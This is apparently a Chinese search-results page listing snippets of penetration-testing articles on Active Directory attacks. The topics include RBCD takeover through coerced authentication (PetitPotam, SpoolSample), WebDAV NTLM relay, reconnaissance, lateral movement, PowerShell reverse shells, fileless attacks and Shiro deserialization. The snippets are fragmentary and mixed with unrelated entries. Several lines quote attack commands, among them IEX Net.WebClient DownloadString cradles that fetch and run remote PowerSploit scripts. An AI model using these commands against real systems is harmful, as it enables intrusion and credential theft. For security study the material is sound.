首页
学习
活动
专区
圈层
工具
发布

从 RPC 到 RCE - 通过 RBCD 和 MS-RPC 接管工作站

简而言之,这是通过以下方式完成的; 通过 MS-RPRN 或 MS-EFSRPC 通过 HTTP 触发机器身份验证。这需要一组用于 RPC 调用的凭据。...将该机器身份验证中继到 LDAPS 以配置 RBCD RBCD 接管 需要注意的是,WebClient 服务不会在启动时自动启动。...这可以通过众所周知的 RPC 调用(无疑还有其他各种未发布的调用)来完成 PetitPotam.exe logger@80/a.txt 192.168.38.104 SpoolSample.exe 192.168.38.104...您可以通过 PowerShell 命令远程枚举它,该命令Get-NTFile -Win32Path '\\target-ip\pipe\DAV RPC SERVICE'返回命名管道(如果可访问)。...当域用户浏览该 SMB 共享并查看您植入的“searchConnector-ms”文件时,WebClient 服务将在他们的工作站上启动,您可以继续执行上面的步骤 2。

1.2K40

基于资源的约束委派(RBCD)

'redteam.lab/dandy' -dc-ip 192.168.134. # 获取dandyTGT的Session Key python3 describeticket.py dandy.ccache...当对启用 WebDAV 的 UNC 路径触发文件操作时,身份验证主机将执行以下操作: 发出一个 OPTIONS 方法来发现 Web 服务器支持的功能, 如果支持 PROPFIND,则发出 PROPFIND...简而言之,这是通过以下方式完成的: 通过 MS-RPRN 或 MS-EFSRPC 通过 HTTP 触发机器身份验证,这需要一组用于 RPC 调用的凭据。...将该机器身份验证中继到 LDAP/LDAPS 以配置 RBCD/Shadow Credentials 需要注意的是,WebClient 服务不会在启动时自动启动。...如果webclient未开启,低权限可以用StartWebClientSvc.o来打开 2.利用sc服务查询 sc query webclient sc config webclient start=

3.8K40
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    通过WebDav进行NTLM Relay

    0x1 前言 ​ NTLM Relay大家已经不再陌生了,很多时候我们通过NTLM Relay进行攻击时,会受到协议签名(ldap/s、smb等协议签名)的影响从而导致攻击失败,并且随着时间的流逝...Windows通过WebClient服务实现WebDav,允许Windows程序通过WebDav来创建、读取以及写入服务器上的文件,并通过HTTP服务进行通信,在客户端访问WebDav时,若开启Windows...发现目标后,为了让Relay顺利进行,我们可以添加一份DNS A记录,从而使得WebDav通过默认凭据来对我们进行身份验证,由于在Windows当中,WebDav由WebClient服务实现,而WebClient...,使用PetitPotam 强制WebDav服务器认证我们的攻击机,此处不可使用ip进行强制认证,使用我们先前添加的DNS解析进行强制认证,此处的@符号前为主机名,后为端口号。...://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient https://www.hackingarticles.in

    2.3K20

    内网渗透学习-信息收集篇

    区域界限是相对的 机器角色判断 文件服务器:配合社工,生成payload捆绑到文件服务器公用文件上,可批量上线主机 DNS服务器:端口53,可通过DNS服务器获取内网web系统信息,或者探测域信息 DHCP...ipconfig /all 可查看网关IP地址、DNS的IP地址、域名、本机是否和DNS服务器处在同一网段等。...通过反向解析查询命令nslookup来解析域名的IP地址,用解析到的IP地址进行对比,判断域控服务器和DNS服务器是否在同一台机器上 #查看当前权限 whoami #获取域用户SID whoami /...computer #攻击主机CMD扫描同网段存活ip for /L %P in (1,1,254) DO @ping ‐w 1 ‐n 1 192.168.1....#调用本地ps脚本 powershell_import /usr/share/windows-resources/powersploit/Recon/xx.ps1 #命令执行 powershell_execute

    1.3K10

    内网渗透学习-信息收集篇

    区域界限是相对的 机器角色判断 文件服务器:配合社工,生成payload捆绑到文件服务器公用文件上,可批量上线主机 DNS服务器:端口53,可通过DNS服务器获取内网web系统信息,或者探测域信息 DHCP...ipconfig /all 可查看网关IP地址、DNS的IP地址、域名、本机是否和DNS服务器处在同一网段等。...通过反向解析查询命令nslookup来解析域名的IP地址,用解析到的IP地址进行对比,判断域控服务器和DNS服务器是否在同一台机器上 #查看当前权限 whoami #获取域用户SID whoami /...computer #攻击主机CMD扫描同网段存活ip for /L %P in (1,1,254) DO @ping ‐w 1 ‐n 1 192.168.1..../PowerSploit 建立会话后的meterpreter: #加载模块 load powershell #调用本地ps脚本 powershell_import /usr/share/windows-resources

    80811

    「无文件」攻击方式渗透实验

    包括了下载和执行、键盘记录、dns、延时命令等脚本 2、PowerSploit是又一款Post Exploitation 相关工具,Post Exploitation是老外渗透测试标准里面的东西,就是获取...groups.xml 获取明文密码)、 Invoke- ReverseDnsLookup(扫描DNS PTR记录) 渗透开始 首先边界web服务器上fastcgi配置错误,导致服务器被getshell...使用方法还是先把脚本下载到黑客自己的web目录下,我为了方便,我写了一个调用脚本放在web目录下(1.ps1) IEX(New-ObjectNet.WebClient).DownloadString('...:利用smb进行主机识别: use auxiliary/scanner/smb/smb_version 利用刚才找到的管理员密码在内网里面碰撞一下,看看多少主机用的是同样的密码用的是:use auxiliary...详细的文章可以看redis未授权访问总结而redis的csrf漏洞的产生原因是:就是当向redis发送无效指令时,redis自身协议不会终止tcp链接。

    2.7K90

    域渗透-横向移动命令总结

    在正常情况下,切换会话时需要提供目标用户的登录密码,但在SYSTEM权限下能够完全绕过验证,不输入密码即可切换到目标用户的会话,从而实现未授权登录。...测试人员可以利用WMI提供的管理功能,通过已获取的用户凭据,与本地或远程主机进行交互,并控制其执行各种行为。...目前有两种常见的利用方法: 一是通过调用WMI的类方法进行远程执行,如Win32 Process类中的Create方法可以在远程主机上创建进程,Win32 Product类中的Install方法可以在远程主机上安装恶意的...,指定远程主机的地址;/user,指定远程主机的用户名;/password,指定用户的密码 #通过调用Win32 Process.Create方法在远程主机上创建进程,启动CMD来执行系统命令,由于WMI...(10.10.10.19),通过UNC路径进行远程加载测试人员服务器的MSI文件并进行安装,可以获取远程主机的权限 常见工具 impacket wmiexec.py **前提:**主机开启135 445

    2.8K10

    Windows环境下反弹shell各类姿势

    文章前言 在渗透测试过程中我们有时候需要通过Windows平台来反弹shell到我们的VPS主机以及CS端,那么这个过程中我们就需要借助Windows平台内置的可执行程序来执行命令,其中首选的就是powershell...,本篇文章我们主要介绍如何通过Windows平台中如何通过powershell来反弹shell操作 反弹shell powercat反弹 powercat(https://github.com/besimorhino.../powercat)是一个PowerShell函数,首先你需要加载这个函数才能执行它,你可以将下面的命令之一放入你的PowerShell配置文件中,这样在PowerShell启动时powercat就会自动加载...,下面我们介绍powercat如何进行反弹shell并获取服务器端的权限: Step 1:在攻击端一侧监听端口 nc -lnvp 4444 Step 2:在攻击端一侧使用python托管一个powershell...shell 备注:如果提示"You need to install Python Impacket library first",则需要通过安装impacket来执行 git clone https:/

    2K11

    框架安全之Shiro渗透复现

    服务端在接收到一个Cookie时,会按照如下步骤进行解析处理: 检索RememberMe Cookie的值 进行Base64解码 进行AES解码 进行反序列化操作 在第4步中的调用反序列化时未进行任何过滤...本机IP为192.168.112.141 参考:Docker容器进入的4种方式 三、漏洞复现 以复现操作为主,底层原理解析见之后的文章 1、Apache Shiro反序列化漏洞(CVE-2016-4437...是刚刚在Win7上搭建的环境的IP 执行calc,远程打开目标主机上的计算器程序 ?...192.168.112.145Kali Linux192.168.112.149 2、实验模拟过程 1)获取内网服务器并上线CS 重点在于后面内网主机的获取,这里直接假设获取了服务器的权限并上线了CS...也就是说在获取了密钥之后可以通过构建恶意的Cookie获取权限执行攻击命令,得到root权限。解决措施就是升级Shiro版本至shiro1.2.5以上。

    3.6K40

    针对俄罗斯制造企业的Arcane Werewolf钓鱼攻击技术分析与防御对策

    该植入体具备主机信息收集、AES加密回传、C2指令轮询及内存驻留执行等能力,并已观察到其尝试向OT网络横向移动的迹象。尽管攻击者未使用0day漏洞,但其对业务流程与信任关系的精准利用显著提升了成功率。...通过Python实现的LNK文件解析与可疑命令检测原型验证了该体系在早期识别阶段的有效性。...加载器核心功能包括:收集主机信息(用户名、计算机名、内网IP、OS版本);使用硬编码AES密钥加密数据;Base64编码后通过HTTP GET请求回传至C2;轮询C2获取后续指令或第二阶段植入体。...加载器在内存中解密该植入体,并通过GetProcAddress调用其导出的start函数,实现无文件执行。此举有效规避了基于磁盘写入的AV检测。...攻击者一旦控制IT侧跳板机,即可通过这些合法通道向OT网络渗透,而现有防火墙策略往往未对应用层协议进行深度过滤。

    23010

    Java爬虫库的选择与实战代码

    因执行JS性能较低HttpClientHTTP协议客户端,专注网络通信发送定制HTTP请求、API调用协议支持全面、连接池高效需搭配解析库使用⚡ 网络性能优异WebMagic完整爬虫框架,模块化设计中大型爬虫项目...高频API调用或定制协议需求:HttpClient 轻量灵活,易于集成到现有架构。企业级大规模爬虫(需分布式/断点续爬):WebMagic 框架级的支持更完善。...page.getHtml(); // 使用XPath提取标题 String title = html.xpath("//h1/text()").get(); // 获取当前页所有链接继续爬取...反爬策略:设置合理请求间隔(如setSleepTime(1000))轮换User-Agent与代理IP池资源管理:HtmlUnit/Selenium 及时关闭WebClient对象HttpClient...代码示例均测试可用,依赖包版本建议:Jsoup: 1.17.2 HtmlUnit: 4.0.0 WebMagic: 0.10.0 可通过Maven中央库引入。

    45420

    阿里云Windows迁移腾讯云方案

    、是否安装了腾讯云平台组件(监控组件、TAT自动化助手、主机安全组件) 1)内网域名解析 由于内网服务依赖内网域名正确解析,所以需要先确保内网域名解析到内网IP,默认VPC DNS(183.60.83.19...、183.60.82.98)能解析到正确的内网IP,如果客户业务需要改过DNS使得内网域名解析有问题的话会影响平台内网服务,比如云监控、主机安全、TAT、Windows KMS激活等。...关于内网域名解析建议参考这篇文档配置: https://cloud.tencent.com/developer/article/2294795 2)安装平台组件并结合官网文档检查功能是否正常,如果内网域名解析正常.../document/product/1340/51945 云监控组件官网文档: https://cloud.tencent.com/document/product/248/6211 主机安全官网文档...windows.extendvolumes.ExtendVolumesPlugin #C分区extend volume,前提是C分区跟其后面空白区域之间没有其他分区阻挡 sethostname.SetHostNamePlugin #设置hostname(创建机器时可以传入这个参数

    1.9K11

    渗透测试常规操作记录(下)

    +端口 1008 Frp https://github.com/fatedier/frp/releases/ 使用条件:目标主机通外网,拥有自己的公网ip 对攻击机外网服务端frps.ini进行配置...只需要更换目标的IP,就可以获取session。...--add-computer 当目标重启网络、访问浏览器、重启电脑时会把攻击机视为代理服务器,当目标通过攻击机代理服务器访问网络时,攻击机将会向目标发送代理的认证请求,并中继NTLM认证到LDAP服务器上...当域控机器未启用LDAPS,并且已获得域普通用户权限时 使用powermad创建一个机器账户newcom https://github.com/Kevin-Robertson/Powermad >New-MachineAccount...当访问一个不存在的共享时修改配置文件来解析 Xp 修改/usr/share/responder/servers/SMB.py定位到errorcode修改为\x71\x00\x00\xc0,删除掉/usr

    6.3K50

    内网渗透基石篇—信息收集(下)

    Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon...\test.txt" # 使用修改组策略的方式限制登录 powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com...具体需要通过机器内的主机名、文件、网络连接等多种情况进行综合判断 主机名是最好判断的,通常Web或App是Web服务器;Dev是开发服务器;NAS是存储服务器;File或者Fileserver是文件服务器...使用arp -a + nbtstat -A ip是否存在主机名为Proxy的主机 IE浏览器的Internet设置(直接连接、PAC文件) 最终用Curl进行确认 12 curl www.baidu.com...绘制内网拓扑图 通过目标主机及所在域的各类信息,就可以绘制内网的拓扑图了。 总结: 本文是通过阅读《内网渗透攻防》来学习内网知识,从0到1。

    2.4K20
    领券